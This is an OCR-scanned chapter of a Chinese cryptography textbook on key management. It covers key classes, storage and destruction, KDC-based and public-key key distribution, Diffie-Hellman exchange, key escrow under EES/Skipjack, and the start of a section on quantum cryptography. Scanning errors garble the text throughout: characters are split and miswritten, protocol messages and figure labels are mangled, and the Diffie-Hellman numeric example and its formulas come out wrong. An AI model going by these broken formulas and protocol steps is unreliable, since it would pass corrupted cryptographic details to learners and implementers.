公开 密 铀 | 问题 “| N 对 很 难 不 需 安全 通道 | 慢 A 和 
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3.4 密 钥 管理 


现代 通信 系统 采用 密码 技术 保护 ,其 算法 通常 是 公开 的 ,因此 系统 的 安全 性 就 取决 于 对 
密 钥 的 保护 。 密 钥 生 成 算法 的 强度 、 密 钥 的 长 度 、 密 钥 的 保密 和 安全 管理 是 保证 系统 安全 的 
重要 因素 。 

密 钥 管理 是 指 处 理 密 钥 自 产 生 到 最 终 销 毁 的 有 关 问 题 的 全 过 程 ,大 体 上 讲 , 密 钥 管理 包 
括 密 钥 的 生成 ,存储 、 分 配 、 更 新 、 备 份 . 启 用 与 恢复 、 停 用 与 撤销 、 销 毁 等 诸多 方面 ,其 中 密 钥 
的 分 配 与 存储 可 能 最 棘手 。 密 钥 管理 的 目的 是 维持 系统 中 各 实体 之 间 的 密 钥 关 系 ,以 抗击 
各 种 可 能 的 威胁 。 密 钥 管理 要 借助 加 密 、 认 证 、 签 名 ,协议 和 公证 等 技术 。 


3.4.1 密 钥 的 分 类 与 产生 


1. 密 钥 的 分 类 

从 网 络 应 用 来 看 , 密 钥 一 般 分 为 以 下 几 类 ， 

(1) 基本 密 钥 。 又 称 为 初始 密 钥 ,是 由 用 户 选 定 或 由 系统 分 配 ,可 在 较 长 时 间 内 由 一 对 
用 户 专门 使 用 的 秘密 密 钥 , 也 称 为 用 户 密 钥 。 基 本 密 钥 既 要 安全 ,又 要 便于 更 换 。 基 本 密 钥 
与 会 话 密 钥 一 起 用 于 启动 和 控制 密 钥 生成 器 ,从 而 生成 用 于 加 密 数据 的 密 钥 流 。 

(2) 会 话 密 钥 。 即 两 个 通信 终端 用 户 在 一 次 通话 或 交换 数据 时 所 用 的 密 钥 。 当 其 用 于 
保护 传输 的 数据 时 称 为 数据 加 密 密 钥 ,而 用 于 保护 文件 时 称 为 文件 密 钥 。 会 话 密 钥 可 由 通 
信 双 方 预先 约定 ,也 可 由 系统 动态 地 产生 并 赋予 通 信 双 方 , 它 为 通信 双方 专用 , 故 又 称 为 专 
用 密码 。 

(3) 密 钥 加 密 密 钥 。 用 于 对 传送 的 会 话 或 文件 密 钥 进行 加 密 时 采用 的 密 钥 ,也 称 为 次 
主 密 钥 、 辅 助 密 钥 或 密 钥 传 送 密 钥 。 每 个 节点 都 分 配 有 一 个 这 类 密 钥 ,一 般 各 节点 的 密 钥 互 
不 相同 。 每 个 节点 都 须 存储 其 他 各 节点 和 本 节点 通信 所 用 的 密 钥 加 密 密 钥 ,而 各 终端 只 需 
要 一 个 与 其 节点 交换 会 话 密 钥 时 所 需要 的 密 钥 加 密 密 钥 , 称 为 终端 主 密 钥 。 

(4) 主机 主 密 钥 。 是 对 密 钥 加 密 密 钥 进 行 加 密 的 密 钥 , 存 于 主机 处 理 器 中 。 除 了 上 述 
几 种 密 钥 外 ,还 有 一 些 密 钥 ,如 用 户 选择 密 钥 ,算法 更 换 密 钥 等 ,这 些 密 钥 的 某 些 作用 可 以 归 
人 上 述 几 类 中 。 

2. 密 钥 的 产生 与 长 度 选择 

不 同 种 类 的 密 钥 产 生 的 方法 不 同 。 基 本 密 钥 是 控制 和 产生 其 他 加 密 密 钥 的 密 钥 ,而且 
长 期 使 用 ,其 安全 性 非常 关键 ,需要 保证 其 完全 随机 性 、 不 可 重复 性 和 不 可 预测 性 。 而 任何 
密 钥 产生 器 产生 的 密 钥 都 有 周期 性 和 被 预测 的 危险 ,不 适宜 作 主 机 密 钥 。 

主机 主 密 钥 通 常用 诸如 搁 硬 币 、 货 子 或 从 随机 数 表 中 选 数 等 随机 方式 产生 。 密 钥 加 密 
密 钥 可 由 安全 算法 (如 在 主机 主 密 钥 控制 下 ,由 x9. 17 安全 算法 生成 )、 二 极 管 噪声 产生 器 、 
伪 随 机 数 产生 器 等 生成 ,也 可 以 由 密 钥 操作 员 选 定 。 会 话 密 钥 可 在 密 钥 加 密 密 钥 作用 下 通 
过 某 种 加 密 算法 动态 生成 ,如 用 密 钥 加 密 密 钥 控制 DES 算法 生成 。 基 本 密 钥 量 小 ,可 用 生 
成 密 钥 加 密 密 钥 或 主机 主 密 钥 的 方法 生成 。 

密 钥 长 度 的 选择 与 加 密 数 据 的 重要 性 和 保密 期 限 有 关 。 当 加 密 算法 除了 穷 举 外 无 其 他 
破译 捷径 时 , 密 钥 长 度 和 每 秒 可 实现 的 搜索 密 钥 数 决定 了 密码 体制 的 安全 性 。 当 密 钥 的 长 
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度 为 n 位 时 ,有 2" 个 可 能 的 穷 举 对 象 。 密 钥 搜索 速度 由 计算 资源 决定 。 
因此 , 密 钥 长 度 的 选择 与 破译 的 代价 有 关 ,也 与 具体 的 应 用 有 关 , 如 数据 的 重要 性 、 保 密 
期 限 的 长 短 、 可 能 破译 者 的 计算 能 力 大 小 等 。 目 前 ,长 度 在 128 位 以 上 的 密 钥 是 安全 的 。 


3.4.2 密 钥 的 管理 


1. 密 钥 存储 

将 密 钥 保存 到 一 个 合适 的 载体 上 ,如 磁卡 .存储 IC 卡 、 智 能 IC 卡 和 U 盘 等 上 面 , 用 时 
通过 专用 读 取 器 输入 终端 设备 。 安 全 可 靠 的 存储 介质 是 密 钥 安全 存储 的 物质 条 件 ,安全 严 
密 的 访问 控制 机 制 是 密 钥 安 全 存储 的 管理 条 件 , 密 钥 安全 存储 的 原则 是 不 允许 密 钥 以 明文 
形式 出 现在 密 钥 管 理 设备 之 外 。 

密 钥 的 存储 形态 可 以 是 明文 形式 、. 密 文 形式 .分 量 形式 。 分 量 存储 的 不 是 密 钥 本 身 , 而 
是 用 于 产生 密 钥 的 部 分 参数 ,只 知道 其 中 一 个 或 部 分 分 量 ,无 法 求 出 其 他 分 量 。 

2. 密 钥 分 配 

密 钥 分 配 是 指 密码 系统 中 密 钥 的 安全 分 发 和 传送 过 程 , 它 要 解决 的 问题 就 是 将 密 钥 安 
全 地 分 配给 保密 通信 的 各 方 。 依 据 分 配 手段 , 密 钥 分 配 可 分 为 人 工分 发 (物理 分 发 ) 和 密 钥 
交换 协议 动态 分 发 两 种 。 从 密 钥 属 性 上 看 ,又 分 为 秘密 密 钥 分 配 和 公开 密 钥 分 配 两 种 。 从 
密 钥 分 配 技术 来 说 ,有 基于 对 称 密码 体制 的 密 钥 分 配 和 基于 公 钥 密码 体制 的 密 钥 分 配 等 。 
目前 有 关 密 钥 分 配 的 方案 多 种 多 样 。 

3. 密 钥 有 效 期 

密 钥 有 效 期 就 是 密 钥 的 生命 期 ,不 同性 质 的 密 钥 应 根据 其 不 同 的 使 用 目的 有 不 同 的 有 
效 期 。 破 译 一 个 密 钥 需要 时 间 ,长 期 使 用 一 个 密 钥 会 产生 大 量 同 密 钥 密 文 ,便于 攻击 者 密码 
分 析 , 限 制 密 钥 的 使 用 时 间 也 就 限制 了 密 钥 的 破译 时 间 ,降低 了 密 钥 被 破译 的 可 能 性 。 一 个 
密码 应 用 系统 必须 有 一 个 策略 能 够 检验 密 钥 的 有 效 期 。 

4. 密 钥 蔡 换 与 更 新 

当 密 钥 已 泄漏 ,或 者 被 破坏 或 将 要 过 期 时 ,就 要 产生 新 的 密 钥 来 蔡 换 或 更 新 旧 的 密 钥 。 

5. 密 钥 备份 

密 钥 的 备份 应 当 是 异 设备 备份 和 异地 备份 ,备份 的 密 钥 应 当 受 到 与 存储 密 钥 一 样 的 保 
护 。 为 了 减少 明文 形态 的 密 钥 数 量 , 一 般 采 用 高 级 密 钥 保护 低级 密 钥 的 方式 来 进行 备份 。 
对 于 高 级 密 钥 ,不 能 以 密 文 形态 备份 。 为 了 进一步 增强 安全 ,可 采用 多 个 密 钥 分 量 的 形态 进 
行 备份 。 密 钥 的 备份 应 当 方便 恢复 , 密 钥 的 恢复 应 当 经 过 授权 ,而 且 要 遵循 安全 的 规章 制 
度 。 密 钥 的 备份 和 恢复 都 要 记录 日 志 , 并 进行 审计 。 

6. 密 钥 终止 

在 密 钥 过 期 之 前 密 钥 因 丢失 、 汇 露 或 其 他 原因 ,需要 停止 使 用 或 撤销 ,将 它 从 正常 运行 
使 用 的 集合 中 除去 , 称 为 密 钥 的 终止 。 只 要 密 钥 尚 未 销毁 ,就 应 该 妥善 保护 。 

7. 密 钥 的 启用 与 恢复 

密 钥 在 产生 后 启用 或 停 用 撤销 后 由 于 需要 恢复 使 用 ,行使 正常 密 钥 功 能 。 

8. 密 钥 销 毁 

不 用 的 旧 密 钥 必 须 销 毁 。 彻 底 清除 密 钥 的 一 切 存储 形态 和 相关 信息 ,使 重复 这 一 密 钥 
变 得 不 可 能 。 如 采用 高 质量 的 碎 纸 机 处 理 记录 密 钥 的 纸张 ;对 于 硬盘 ` EEPROM 中 的 存储 
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器 要 进行 多 次 重 写 。 
3.4.3 密 钥 分 配 


任何 密码 系统 的 强度 都 依赖 于 密 钥 分 配 技术 , 密 钥 分 配 研究 密码 系统 中 密 钥 的 分 发 和 
传送 中 的 问题 。 

1. 对 称 密码 体制 的 密 钥 分 配 

对 称 密码 的 密 钥 分 配 的 方法 归纳 起 来 有 两 种 : 利用 公 钥 密码 体制 实现 和 利用 安全 信道 
实现 。 利 用 公 钥 密码 体制 实现 见 3. 4.4 节 。 

利用 安全 信道 实现 直接 面议 或 通过 可 靠 的 信使 传递 ,传统 的 方法 是 通过 邮递 或 信使 传 
送 密 钥 , 密 钥 可 用 打印 .穿孔 纸 带 或 电子 形式 记录 。 这 种 方案 的 安全 性 完全 取决 于 信使 的 忠 
诚 和 素质 。 这 种 方式 成 本 较 高 ,有 人 估计 分 配 密 钥 的 费用 占 密码 系统 费用 的 1/3。 为 了 减 
少 费 用 ,可 采用 分 层 的 方法 ,信使 只 传送 密 钥 加 密 密 钥 ,这 种 方法 只 适 于 高 安全 级 密 钥 ,如 主 
密 钥 的 传递 。 也 可 采用 某 种 隐蔽 的 方法 ,如 将 密 钥 分 拆 成 几 部 分 分 别 递送 ,除非 敌手 可 以 截 
获 密 钥 的 所 有 部 分 。 这 只 适 于 少量 密 钥 的 情况 ,如 主 密 钥 . 密 钥 加 密 密 钥 。 会 话 密 钥 可 以 用 
主 密 钥 加 密 后 通过 公用 网 络 传送 。 

两 个 用 户 ( 主 机 、 进 程 .应 用 程序 ) 在 用 单 钥 密码 体制 进行 保密 通信 时 ,首先 必须 有 一 个 
共享 的 秘密 密 钥 ,其 次 为 防止 攻击 者 得 到 密 钥 ,还 必须 时 常 更 新 密 钥 。 因 此 ,密码 系统 的 强 
度 也 依赖 于 密 钥 分 配 技术 。 两 个 用 户 A 和 B 获得 共享 密 钥 的 方法 有 以 下 4 种 : 

(1) 密 钥 由 A 选取 并 通过 物理 手段 发 送 给 B; 

(2) 密 钥 由 第 三 方 选取 并 通过 物理 手段 发 送 给 A 和 了 B; 

(3) 如 果 A.B 事 先 已 有 一 密 钥 , 则 其 中 一 方 选 取 新 密 钥 后 ,用 已 有 的 密 钥 加 密 新 密 角 
并 发 送 给 另 一 方 ; 

(4) 如 果 A 和 也 与 第 三 方 C 分 别 有 一 保密 信道 , 则 C 为 A.B 选 取 密 钥 后 ,分 别 在 两 个 
保密 信道 上 发 送 给 A、B。 

方法 (1) (2) 和 (3) 分 配 密 钥 的 代价 可 能 很 大 ,一 般 采 用 方法 (4)。(4) 中 的 第 三 方 通常 
是 一 个 负责 为 用 户 分 配 密 钥 的 密 钥 分 配 中 心 (Key Distribution Center，KDC ) ,每 一 个 用 户 
必须 与 KDC 有 一 个 共享 密 钥 , 称 为 主 密 钥 。 通 过 主 密 钥 分 配给 一 对 用 户 的 密 钥 叫 作 会 话 
密 钥 ,会 话 密 钥 用 于 这 一 对 用 户 之 间 的 保密 通信 ,通信 完成 后 会 话 密 钥 即 被 销毁 。 

2. 基于 KDC 的 密 钥 分 配方 案 

KDC 作为 第 三 方 安全 保密 信道 , 密 钥 分 配 过 程 如 图 3. 15 所 示 。 假 定 两 个 用 户 A 和 B 
分 别 有 一 个 只 有 自己 和 密 钥 分 配 中 心 知道 的 共享 主 密 钥 KA 和 Ks, 人 A 和 希望 与 BB 建立 一 个 逻 
辑 连接 ,需要 用 一 个 一 次 性 的 会 话 密 钥 来 保护 经 过 这 个 连接 传输 的 数据 。 密 钥 分 配 过 程 
如 下 : 

(1) A 向 KDC 发 出 会 话 密 钥 请 求 。 请 求 消息 由 两 个 数据 项 组 成 ,第 一 项 是 A 和 B 的 
身份 标识 IDA 和 IDs, 第 二 项 是 这 次 业务 的 唯一 识别 符 Ni , Ni 可 以 是 时 戳 或 随机 数 ,只 要 
每 次 请 求 所 用 的 N 有 所 不 同 就 可 以 了 。 时 戳 是 用 来 证 明 某 一 事件 发 生 时 间 的 方法 。 例 
如 ,规定 密 钥 有 效 期 可 以 阻止 重 放 攻击 。 

“| ”表示 连接 ,X | Y 表示 将 串 X 与 串 了 连接 起 来 。 请 求 * 消 息 ” 的 形式 表示 为 
TIDA ‖ TDs | Ni 或 “请 求 ‖ Ni”。 这 里 “请 求 " 可 以 表述 为 IDA 上 | IDs。 
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@ExLKJ 请 求 INi|Exs(E,, IDA)] 


@Exs(K, | IDN) 


响应 者 B 


Ex(N,) 


@Ex LNY) 


图 3.15 密 钥 分 配 


(2) KDC 为 A 的 请 求 作出 应 答 。 应 答 是 由 Ks 加 密 的 消息 ,只 有 A 才能 成 功 地 对 这 一 
消息 解密 ,并 且 A 可 以 相信 这 一 消息 的 确 是 由 KDC 发 出 的 。 消 息 中 包含 A 希望 得 到 的 一 
次 性 会 话 密 钥 K, 和 A 在 (1) 中 发 出 的 请 求 ,包括 一 次 性 随机 数 Ni( 目 的 是 让 A 将 收 到 的 应 
答 与 发 出 的 请 求 相 比较 ,检查 是 否 匹 配 ) 。A 据 此 能 验证 自己 发 出 的 请 求 在 被 KDC 收 到 之 
前 未 被 他 人 算 改 ,并 且 相 信 自己 收 到 的 应 答 不 是 重 放 过 去 的 应 答 。 

消息 中 还 包含 B 希望 得 到 的 一 次 性 会 话 密 钥 K, 以 及 A 的 身份 ID ,这 两 项 信息 经 KK 
加 密 ,通过 A 转发 给 B, 以 建立 A,B 之 间 的 连接 并 用 于 向 B 证 明 A 的 身份 。 应 和 消息 也 可 

Ex, LKs 上 请 求 | Ni | Ex (Ks,IDa) 」 

(3) A 存储 会 话 密 钥 Ks, 并 向 B 转发 Er, (E, | IDA)。B 收 到 后 获取 Ks ,并 根据 TDA 
确信 另 一 方 是 A, 还 从 Eu 知道 Ks 的 确 来 自 KDC。 至 此 ,会 话 密 钥 就 分 配给 了 A 和 B。 

(4) B 用 会 话 密 钥 Ks 加 密 另 一 个 一 次 性 随机 数 Ns ,并 将 加 密 结果 发 送 给 A。 

(5) A 以 /CN;) 作 为 对 B 的 应 答 ,将 应 答 用 会 话 密 钥 加 密 后 发 送 给 B。 

3. 无 中 心 密 钥 控制 

用 KDC 为 用 户 分 配 密 钥 时 ,要 求 用 户 都 信任 KDC, 同 时 还 要 求 对 KDC 进行 保护 。 若 
密 钥 分 配 是 无 中 心 的 , 则 不 必 考 虑 这 两 个 要 求 。 无 中 心 密 钥 分 配 参考 其 他 教材 。 


3.4.4 公 钥 加 密 体 制 密 钥 管 理 


公 钥 密码 的 主要 作用 之 一 就 是 解决 密 钥 分 配 问题 。 密 钥 分 配 实践 中 , 公 钥 密码 可 以 应 
用 于 两 个 不 同 的 方面 : 公 钥 分 配 和 单 钥 密码 体制 的 密 钥 分 配 。 

1. 公 钥 的 分 配 

(1) 公开 发 布 。 公 开发 布 是 指 用 户 将 自己 的 公 钥 发 给 每 一 个 其 他 用 户 , 或 向 某 一 团体 
广播 。 优 点 是 简单 ,缺点 是 任何 人 都 可 以 伪造 这 种 公开 发 布 。 

(2) 公用 目录 。 公 用 目录 表 是 指 建立 一 个 公用 的 公 钥 动态 目录 表 , 公 用 目录 的 建立 、 维 
护 及 公 钥 的 分 发 由 某 个 可 信 的 实体 或 组 织 承担 。 优 点 是 比 公开 发 布 的 安全 性 更 高 ,缺点 是 
公 钥 目录 表 仍 可 能 被 伪造 ,也 易 受 到 对 手 窜 扰 。 
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(3) 公 钥 授权 。 类 似 公 用 目录 表 , 假 定 有 一 个 公 钥 管理 机 构 负 责 建 立 、 维 护 通 信 各 方 公 
钥 的 动态 目录 表 。 此 外 ,每 个 用 户 都 可 以 知道 管理 机 构 的 公开 密 钥 ,并 且 只 有 管理 机 构 知道 
相应 的 秘密 密 钥 。 

公 钥 管理 机 构 分 配 公 钥 如 图 3. 16 所 示 ,这 里 请求 "同上 。A 发 送 请 求 和 时 间 蕉 1 给 公 
钥 管理 机 构 ; 公 钥 管理 机 构 返 回 用 它 的 私 钥 加 密 的 消息 ,包括 B 的 公 钥 ;A 用 机 构 公 钥 解密 
后 用 B 的 公 钥 机 密 IDs 和 随机 数 Ni 给 B;B 用 自己 私 钥 解 密 得 到 请 求 通信 信息 ,发 送 请 求 
给 管理 机 构 请 求 A 的 公 钥 ;B 收 到 机 构 返回 消息 后 用 机 构 公 钥 解密 得 到 A 的 公 钥 ; 选 随机 
数 N; 与 Ni 合并 后 用 A 的 公 钥 加 密 发 送 给 A;A 解密 得 到 N, 并 用 B 的 公 钥 加 密 发 送 给 
B, 这 样 ,通过 公 钥 管理 机 构 完成 公 钥 分 配 并 认证 了 来 源 。 


公 钥 管理 机 构 


钙 请 求 | 时 间 ， 图 请 求 | 时 间 。 


@EsraubPKal| 请 求 | 时 间 1J] 
@EsuLPK 请 求 | 时 间 :| 


@Epxrs(ID4 | N) 
@EpkA(N || N,) 
EpralN] 


图 3. 16 公 钥 管理 机 构 分 配 公 钥 


优点 是 比 前 两 种 方法 具有 更 高 安全 性 。 缺 点 是 由 于 用 户 间 的 联系 都 要 求助 于 公 钥 管理 
机 构 分 配 公开 密 钥 , 公 钥 管理 机 构 可 能 成 为 系统 的 瓶颈 。 另 外 ,有 维护 的 公 钥 目 录 表 也 可 能 
被 对 手 窗 扰 。 

(4) 公 钥 证 书 。 公 钥 证 书 方式 是 指 用 户 通 过 公 钥 证 书 交 换 自 己 的 公 钥 而 无 须 与 公 钥 管 
理 机 构 联 系 , 公 钥 证 书 由 证 书 管理 机 构 CA 为 用 户 建立 。 用 户 可 将 自己 的 公开 钥 通 过 公 钥 
证 书 发 给 另 一 个 用 户 ,接收 方 可 用 CA 的 公 钥 对 证 书 加 以 验证 。 优 点 是 克服 了 公 钥 管理 机 
构 模 式 的 不 足 。 

2. 单 钥 密码 体制 的 密 钥 分 配 

1) 简单 分 配 

如 果 发 起 者 A 希望 与 响应 者 B 通信 ,可 按 如 下 步骤 建立 会 话 密 钥 ， 

(1) A 产 生 自 己 的 一 对 密 钥 {PKA SKA} ,并 向 BB 发 送 PKA | IDA, 其 中 IDA 是 A 的 
身份 。 

(2) B 产 生 会 话 密 钥 Ks ,并 用 A 的 公开 密 钥 PKA 对 Ks 加 密 后 发 往 A, 如 图 3. 17 
所 示 。 


OPKAl/D、 


Q@Eprs [Ks] 


图 3.17 用 公 钥 密 钥 简单 分 配 会 话 密 钥 
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(3) A 由 Dae, [Ex, [Ks]] 恢 复 会 话 密 钥 Ks。 

(4) A 销毁 {PKA SKA},B 销毁 PK。。 

至 此 ,A,B 可 用 单 密 钥 加 密 算法 ,以 Ks 作为 会 话 密 钥 进行 保密 通信 了 ,通信 完成 后 都 
将 Ks 销毁 。 

2) 具有 保密 性 和 认证 性 的 密 钥 分 配 

这 种 方法 既 可 防止 被 动 攻击 ,又 可 防止 主动 攻击 ,如 图 3. 18 所 示 。 假 定 A.B 双方 已 完 
成 公 钥 交换 ,可 按 以 下 步骤 建立 共享 会 话 密 钥 ， 


DEpralN | IDA] 


@EpkslN | Nl 


ErrslEsxralKs | N]] 
图 3.18 具有 保密 性 和 认证 性 的 密 钥 分 配 


(1) A 用 B 的 公开 钥 PKs 加 密 A 的 身份 IDA 和 一 个 一 次 性 随机 数 N, 后 发 往 B, 其 中 
Ni 用 于 唯一 地 标识 这 一 业务 。 

(2) B 用 PKA 加 密 N 和 B 新 产生 的 一 次 性 随机 数 N, 后 发 往 A。B 发 来 的 消息 中 Ni 
的 存在 可 使 A 相信 对 方 的 确 是 B。 

(3) A 选 一 个 会 话 密 钥 Ks ,用 自己 的 私 钥 SKA 加 密 Ks 和 Ns, 然 后 再 用 PKs 进行 二 
次 加 密 后 返回 给 B, 其 中 用 B 的 公开 钥 加 密 是 为 保证 只 有 B 能 解读 加 密 结果 ,用 A 的 秘密 
钥 加 密 是 保证 该 加 密 结果 只 有 A 能 发 送 ,附送 N, 使 B 相信 对 方 的 确 是 A。 

(4) B 以 PK。、SKs 进行 二 次 解密 来 恢复 会 话 密 钥 Ks。 


3.4.5 Diffie-Hellman 密 钥 交换 


密 钥 交换 协议 (Key Exchange Protocol) 是 指 两 人 或 多 人 之 间 通 过 一 个 协议 取得 密 钥 并 
用 于 通信 加 密 。 密 钥 交 换 是 很 重要 的 一 个 环节 ,例如 ,利用 对 称 加 密 算法 进行 一 个 共享 
密 钥 。 

Diffie-Hellman(DH) 密 钥 交 换 是 W. Diffie 和 M. Hellman 于 1976 年 提出 的 第 一 个 公 
钥 密 码 算法 。 算 法 的 唯一 目的 是 使 得 两 个 用 户 能 够 安全 地 交换 密 钥 ,得 到 一 个 共享 的 会 话 
密 钥 ,算法 本 身 不 能 用 于 加 、 解 密 , 其 安全 性 是 基于 有 限 域 中 计算 离散 对 数 的 困难 性 问题 之 
上 的 。 离 散 对 数 问题 是 指 对 任意 正 整数 z, 计 算 g* mod P 是 容易 的 。 但 一 般 来 说 ,已 知 g、 
Y 和 PP, 求 + 使 Y=g* mod 已 是 计算 上 几乎 不 可 能 实现 的 。 

DH 算法 如 图 3. 19 所 示 , 其 中 p 是 大 素数 ,a 是 p 的 本 原 根 ,p 和 a 作为 公开 的 全 程 
元 素 。 
用 户 A 选择 一 保密 的 随机 整数 XA ,并 将 YA 一 axs mod p 发 送 给 用 户 B。 类 似 地 ,用 户 
B 选择 一 保密 的 随机 整数 Xs ,并 将 Ys 二 a*e mod p 发 送 给 用 户 A。 然 后 A 和 B 分 别 由 K= 
YE mod p 和 KK 二 YX mod p 计算 出 的 就 是 共享 密 钥 ,这 是 因为 : 


YA mod p= (a*s mod p)*s mod p = (a*s)*s mod p = aXe* 


smodp 


=a**s mod p= (ax mod p)*s mod p= Yi modp 
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用 户 A 用 户 B 
选择 一 随机 数 YA<p 选择 一 随机 数 Xs<p 
计算 Y=awmodp 计算 Ya=a*smodp 
计算 K=YaYmodp 计算 K=Jwamodp 
图 3.19 DH 算法 


因为 XA ,Xs 是 保密 的 ,敌手 只 能 得 到 p,a,Ys ,Ys ,要 想得到 , 则 必须 得 到 XA ,Xs 中 
的 一 个 ,这 意味 着 需求 离散 对 数 。 因 此 敌手 求 K 是 不 可 行 的 。 
例如 ,p= 二 97,a 二 5,A 和 B 分 别 秘密 地 选 二 36, Xs 二 58, 并 分 别 计算 Y= 二 5” mod 
97 二 50,Ys 二 5% mod 97 二 44, 在 交换 Ys ,Ys 后 ,分 别 计算 : 
K = YXa mod 97 = 443 mod 97 = 75 
K = YsXe mod 97 = 50 mod 97 = 75 
简单 的 DH 协议 (未 进行 认证 ) 容 易 受到 中 间 人 攻击 。 


3.4.6 密 钥 托管 


密 钥 托管 密码 系统 是 具有 备份 解密 能 力 的 密码 系统 , 它 允 许 授权 者 在 特定 的 条 件 下 , 借 
助 于 一 个 以 上 持 有 专用 数据 恢复 密 钥 的 、 可 信赖 的 委托 方 所 提供 的 信息 来 解密 密 文 。 

密 钥 托管 也 称 为 托管 加 密 , 其 目的 是 保证 对 个 人 没有 绝对 的 隐私 和 绝对 不 可 跟踪 的 匿 
名 性 , 即 在 强加 密 中 结合 对 突 发 事件 的 解密 能 力 。 其 实现 手段 是 把 已 加 密 的 数据 和 数据 恢 
复 密 钥 联系 起 来 ,数据 恢复 密 钥 不 必 是 直接 解密 的 密 钥 ,但 由 它 可 得 解密 密 钥 。 数 据 恢复 密 
钥 由 所 信任 的 委托 人 持 有 ,委托 人 可 以 是 政府 机 构 法院 或 有 契约 的 私人 组 织 ; 一 个 密 钥 可 
能 是 在 数 个 这 样 的 委托 人 中 分 拆 。 

密 钥 托管 提供 了 一 个 备用 的 解密 途径 ,在 需要 时 可 通过 密 钥 托管 技术 解密 用 户 的 信息 ， 
而 用 户 的 密 钥 车 丢失 或 损坏 ,也 可 恢复 自己 的 密 钥 。 

密 钥 托管 密码 体制 从 逻辑 上 可 分 为 三 个 主要 部 分 : 用 户 安全 组 件 (User Security 
Component,USC) 、 密 钥 托 管 组 件 (Key Escrow Component, KEC) .数据 恢复 组 件 (Data 
Recovery Component,DRC)。 三 者 的 关系 如 图 3. 20 所 示 ,USC 用 密 钥 Ks 加 密 明文 数据 ， 
并 且 在 传送 密 文 时 一 起 传送 一 个 数据 恢复 域 (Data Recovery Field,DRF)。DRC 使 用 包含 
在 DRF 中 的 信息 及 由 KEC 提供 的 信息 恢复 明文 。KEC 用 于 存储 所 有 的 数据 恢复 密 钥 , 通 
过 向 DRC 提供 所 需 的 数据 和 服务 以 支持 DRC。 

1993 年 4 月 ,美国 政府 提出 了 托管 加 密 标准 EES ,该 标准 不 仅 提供 了 强加 密 功 能 ,同时 
也 为 政府 机 构 提 供 了 实施 法 律 授权 下 的 监听 功能 。EES 通过 一 个 防 帘 扰 的 芯片 技术 实现 
监听 功能 。EES 包括 一 个 加 密 算法 和 法 律 实施 存 取 域 (LEAF) ,加 密 算法 是 由 NSA 设计 的 
Skipjack 方法 ,用 于 加 密 和 解密 用 户 通信 的 消息 ;LEAF 是 为 法 律 实施 提供 后 门 的 域 ,通过 
它 实现 对 用 户 通 信 的 解密 。 

Skipjack 算法 是 一 个 单 钥 分 组 密码 算法 , 密 钥 长 80 位 ,输入 和 输出 的 分 组 长 均 为 64 
位 。 可 采用 4 种 工作 模式 : 电码 本 模式 、 密 码 分 组 连接 模式 、 输 出 反馈 模式 和 密码 反馈 模 
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用 户 安全 组 件 (USC) 


数据 
恢复 密 钥 
密 钥 托管 组 
(KEC) 


数据 恢复 组 件 (DRC) 
图 3.20 密 钥 托管 密码 体制 


式 。 经 过 评价 ,算法 安全 性 较 DES 强 ,并 且 未 发 现 陷 门 。 

托管 加 密 芯片 装 有 以 下 部 分 : Skipjack 算法 .80 位 的 族 密 钥 KF( 同 一 批 芯 片 的 族 密 钥 
都 相同 ) 芯片 单元 标识 符 (UID) 、80 位 的 芯片 单元 密 钥 KU( 是 两 个 80 位 的 芯片 单元 密 角 
分 量 的 异 或 ) .控制 软件 。 因 为 被 调查 的 通信 双方 使 用 相同 的 会 话 密 钥 ,所 以 解密 设备 不 需 
要 对 通信 双方 都 取出 LEAF 及 芯片 单元 密 钥 ,解密 设备 只 需 取出 被 调查 者 一 方 的 LEAF 及 
芯片 单元 密 钥 。 

EES 提出 以 后 , 密 钥 托管 密码 体制 受到 了 普遍 关注 ,已 提出 了 各 种 类 型 的 密 钥 托管 密 
码 体制 ,包括 软件 实现 的 ,硬件 实现 的 有 多 个 委托 人 的 、 防 用 户 欺诈 的 、 防 委托 人 欺诈 的 等 。 


3.5 其 他 新 型 密码 学 


随 着 信息 科学 及 技术 的 发 展 ,其 他 一 些 新 型 密码 体制 如 量子 密码 .DNA 密码 ,混沌 密码 
及 演化 密码 也 取得 了 较 好 的 研究 成 果 , 有 着 良好 的 发 展 前 景 。 


3.5.1 量子 密码 


量子 特性 在 信息 领域 中 有 着 独特 的 功能 ,在 提高 运算 速度 ,确保 信息 安全 、 增 大 信息 容 
量 和 提高 检测 精度 等 方面 可 能 突破 现 有 经 典 信息 系统 的 极限 ,于 是 便 诞 生 了 一 门 新 的 学 科 
分 支 一 一 量子 信息 科学 。 它 是 量子 力学 与 信息 科学 相 结合 的 产物 ,包括 量子 密码 .量子 通信 
和 量子 计算 等 。 量 子 计算 机 所 能 提供 的 巨大 计算 能 力 一 旦 变 为 现实 ,大 多 数 现 有 加 密 技术 
都 将 不 再 有 效 。 

1. 量子 信息 特性 

传统 意义 上 ,任何 粒子 都 处 在 一 个 明确 的 状态 ,是 否 测量 都 不 会 改变 状态 。 而 量子 力学 
中 量子 同时 处 在 不 同 的 状态 ,只 是 这 些 状 态 各 自 有 不 同 的 发 生 概率 (量子 叠加 性 ), 但 是 一 旦 
被 测量 ,状态 就 被 确定 (量子 态 的 韦 缩 ) 。 

利用 量子 作出 的 单一 位 元 就 称 为 量子 位 元 (Quantum Bit,Qubit) 。 量 子 位 元 与 传统 位 
元 的 比较 有 以 下 特性 : 

(1) 传统 位 元 : 任 一 时 刻 , 非 0 即 1, 是 确定 的 ;量子 位 元 : |0> |1>> a10> 二 B11>> 


126 


数据 加 密 基 础 


(SuperPosition, 超 位 置 ), 其 中 |a|’ 十 |Bl:==1。 一 旦 测量 |al? 和 |Bl? 也 是 确定 的 , 非 0 即 
1, 存 在 一 个 发 生 概率 。 


| ， 
(2) 真正 的 随机 性 ， 大 |o>+ 吉 |!> 阁 和 有 1 的 概率 为 状态 10 之 和 1 这。 所 以 


量子 计算 机 可 以 生成 真正 的 随机 数 。 

(3) nn 个 量子 位 元 ,可 以 产生 2% 个 所 有 可 能 组 合 (n 位 二 进 制 数 )。 量 子 计 算 机 的 处 理 
器 有 个 量子 位 元 ,那么 同一 时 间 执 行 一 次 运算 就 可 以 同时 对 所 有 2^ 个 不 同 状态 作 运 算 。 
而 传统 的 电子 计算 机 一 次 只 能 处 理 一 个 状态 。 

(4) 两 个 纠缠 量子 可 以 组 成 4 个 量子 态 |100>,|01> ,|10>,|11> ,通常 将 这 4 个 态 称 
为 Bell 基 ,4 个 态 构 成 四 维 希 尔 伯 特 空间 的 一 组 正 交 完备 归 一 基 。 

